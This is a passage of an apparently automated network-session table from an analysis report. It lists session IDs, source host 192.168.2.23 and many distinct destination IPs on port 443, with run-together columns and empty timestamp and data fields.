                                          20189192.168.2.2358928142.167.195.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20190192.168.2.234652013.178.70.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20191192.168.2.233973089.130.235.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20192192.168.2.233704047.217.113.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20193192.168.2.233570420.128.143.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20194192.168.2.233665063.136.125.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20195192.168.2.2342170149.197.112.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20196192.168.2.234297652.219.50.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20197192.168.2.233921858.145.219.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20198192.168.2.235261648.177.239.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20199192.168.2.2341452167.91.174.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20200192.168.2.2343920165.109.226.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20201192.168.2.2348010104.146.71.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20202192.168.2.235030292.106.71.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20203192.168.2.234949065.71.240.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20204192.168.2.23565909.90.227.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20205192.168.2.2335396161.103.106.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20206192.168.2.235904668.135.236.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20207192.168.2.234080232.165.60.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20208192.168.2.2340534196.226.207.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20209192.168.2.234282698.230.232.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20210192.168.2.2350278165.202.251.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20211192.168.2.2354580106.113.233.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20212192.168.2.2355010221.20.247.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20213192.168.2.235336671.240.51.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20214192.168.2.235074286.75.9.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20215192.168.2.233943849.68.182.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20216192.168.2.2355218208.79.121.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20217192.168.2.235223614.74.104.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20218192.168.2.2356580199.36.243.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20219192.168.2.2335714155.212.83.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20220192.168.2.234060012.97.60.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20221192.168.2.235946043.120.187.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20222192.168.2.2340450174.172.55.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20223192.168.2.2342432194.134.87.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20224192.168.2.2342334223.192.247.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20225192.168.2.2342464183.145.118.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20226192.168.2.234293443.255.142.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20227192.168.2.2334948111.152.44.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20228192.168.2.2333910222.227.39.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20229192.168.2.2337028151.180.35.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20230192.168.2.233731038.248.63.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20231192.168.2.234525092.44.94.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20232192.168.2.2350060101.57.171.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20233192.168.2.2353764118.185.136.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20234192.168.2.235007883.145.116.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20235192.168.2.2332788122.164.2.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20236192.168.2.235329834.42.32.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20237192.168.2.2357614126.12.245.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20238192.168.2.234038044.8.180.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20239192.168.2.2348530180.217.3.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20240192.168.2.236052614.96.224.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20241192.168.2.235108024.244.219.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20242192.168.2.234190088.75.128.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20243192.168.2.2345690191.162.60.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20244192.168.2.235263614.102.219.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20245192.168.2.234561483.61.252.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20246192.168.2.2350638145.90.86.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20247192.168.2.2341422164.126.27.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20248192.168.2.235949244.122.161.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20249192.168.2.233767890.215.174.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20250192.168.2.2345824111.242.148.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20251192.168.2.2343650213.42.242.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20252192.168.2.233931412.138.233.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20253192.168.2.233406645.121.223.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20254192.168.2.2342784109.154.67.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20255192.168.2.233834284.9.239.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20256192.168.2.2354112217.211.118.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20257192.168.2.235505891.112.27.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20258192.168.2.235070252.170.206.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20259192.168.2.2346084191.234.165.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20260192.168.2.2340720102.70.247.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20261192.168.2.2351578183.74.55.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20262192.168.2.23510022.175.248.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20263192.168.2.234937472.154.72.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20264192.168.2.233504275.213.245.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20265192.168.2.2355520216.112.230.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20266192.168.2.2354612212.233.172.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20267192.168.2.2350082198.196.119.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20268192.168.2.2333802175.127.196.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20269192.168.2.2351340133.90.161.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20270192.168.2.2354218139.138.152.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20271192.168.2.2338320165.249.99.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20272192.168.2.2338010108.77.48.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20273192.168.2.233811497.191.112.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20274192.168.2.234413844.210.127.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20275192.168.2.233366699.66.36.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20276192.168.2.2333828101.152.140.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20277192.168.2.2350282140.117.199.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20278192.168.2.2355490187.125.173.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20279192.168.2.234322281.23.13.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20280192.168.2.2356744216.137.197.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20281192.168.2.235990865.202.122.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20282192.168.2.233942823.77.220.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20283192.168.2.2339742213.145.51.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20284192.168.2.2341264123.184.162.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20285192.168.2.235087231.108.229.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20286192.168.2.2347874192.227.144.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20287192.168.2.233397482.44.165.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20288192.168.2.233373665.114.120.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20289192.168.2.2353872159.125.138.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20290192.168.2.234032227.127.198.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20291192.168.2.234344896.199.240.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20292192.168.2.2340942195.206.198.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20293192.168.2.2357664145.92.255.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20294192.168.2.2349692128.23.186.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20295192.168.2.235850013.225.55.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20296192.168.2.234862636.9.87.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20297192.168.2.235942414.235.78.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20298192.168.2.2341530149.66.97.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20299192.168.2.2353472155.154.40.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20300192.168.2.235318046.193.253.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20301192.168.2.2353130107.29.58.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20302192.168.2.2360754107.43.119.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20303192.168.2.2358362121.113.185.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20304192.168.2.2354380170.91.225.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20305192.168.2.2339022186.94.228.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20306192.168.2.233843260.152.88.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20307192.168.2.234178287.30.137.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20308192.168.2.235176820.25.215.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20309192.168.2.2354084174.123.181.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20310192.168.2.2341968156.140.205.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20311192.168.2.2338578109.76.171.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20312192.168.2.2338942118.240.123.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20313192.168.2.2336426102.179.194.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20314192.168.2.2350538101.112.228.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20315192.168.2.2350114206.128.129.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20316192.168.2.2352738117.222.197.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20317192.168.2.2348070143.196.225.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20318192.168.2.2339412112.215.117.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20319192.168.2.2336736135.26.252.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20320192.168.2.235008882.134.94.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20321192.168.2.2347738143.78.81.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20322192.168.2.2350836181.103.22.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20323192.168.2.234467287.75.156.1638080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20324192.168.2.2338272191.61.194.2538080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20325192.168.2.2339990140.187.65.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20326192.168.2.233950831.157.60.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20327192.168.2.2344128200.84.32.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20328192.168.2.233937232.55.191.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20329192.168.2.235405824.30.68.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20330192.168.2.2339140179.37.120.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20331192.168.2.234953018.199.214.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20332192.168.2.233543298.209.233.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20333192.168.2.235854876.179.49.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20334192.168.2.2338382203.133.8.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20335192.168.2.235279884.50.73.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20336192.168.2.2336376189.141.99.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20337192.168.2.235032832.110.232.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20338192.168.2.2339486220.39.6.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20339192.168.2.2349364143.190.228.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20340192.168.2.234607835.46.21.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20341192.168.2.234658269.255.188.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20342192.168.2.2335086104.255.211.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20343192.168.2.233833613.231.41.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20344192.168.2.2337348213.117.245.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20345192.168.2.2352494116.85.74.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20346192.168.2.235597678.153.108.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20347192.168.2.2336294222.118.193.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20348192.168.2.2349064146.103.254.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20349192.168.2.233816869.229.78.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20350192.168.2.2337464151.87.195.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20351192.168.2.2340766140.163.125.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20352192.168.2.235412241.195.230.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20353192.168.2.2334882174.179.74.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20354192.168.2.2338528201.235.64.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20355192.168.2.2354372172.78.167.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20356192.168.2.2343258134.7.116.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20357192.168.2.2346394124.98.213.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20358192.168.2.234384269.3.79.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20359192.168.2.235083477.79.200.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20360192.168.2.2338330100.239.242.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20361192.168.2.235167817.214.238.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20362192.168.2.2349674136.44.220.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20363192.168.2.2354078200.245.145.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20364192.168.2.2355788129.138.115.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20365192.168.2.234026083.91.195.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20366192.168.2.2348240135.127.229.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20367192.168.2.235889823.145.202.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20368192.168.2.2341822121.176.185.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20369192.168.2.235168870.75.189.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20370192.168.2.2346692139.234.1.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20371192.168.2.2349488129.119.3.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20372192.168.2.235874698.23.12.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20373192.168.2.234676863.31.231.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20374192.168.2.234825623.235.134.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20375192.168.2.2355232148.27.68.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20376192.168.2.233884657.198.179.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20377192.168.2.2333642218.165.58.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20378192.168.2.2359752172.229.79.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20379192.168.2.235265227.74.123.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20380192.168.2.2337500142.155.18.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20381192.168.2.2334596159.106.32.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20382192.168.2.2342682186.6.109.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20383192.168.2.234787860.248.237.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20384192.168.2.2344578205.104.53.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20385192.168.2.2337342138.34.224.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20386192.168.2.2348678163.106.66.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20387192.168.2.233425063.233.148.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20388192.168.2.23543024.185.5.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20389192.168.2.2360440130.28.189.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20390192.168.2.235032857.27.249.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20391192.168.2.2346574181.95.48.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20392192.168.2.2334576181.25.210.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20393192.168.2.2357930164.202.117.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20394192.168.2.233405825.125.11.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20395192.168.2.2347064113.123.157.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20396192.168.2.233562668.30.137.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20397192.168.2.2350202164.14.255.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20398192.168.2.2347588179.205.195.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20399192.168.2.235390466.241.176.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20400192.168.2.235160891.201.24.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20401192.168.2.2347872221.148.34.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20402192.168.2.2334436108.236.185.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20403192.168.2.2333812109.91.245.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20404192.168.2.2347826218.219.137.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20405192.168.2.2359482117.119.16.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20406192.168.2.2336682176.22.82.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20407192.168.2.2335638163.155.85.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20408192.168.2.2360880146.75.34.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20409192.168.2.233718848.55.231.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20410192.168.2.233977054.188.228.76443
                                          TimestampBytes transferredDirectionData


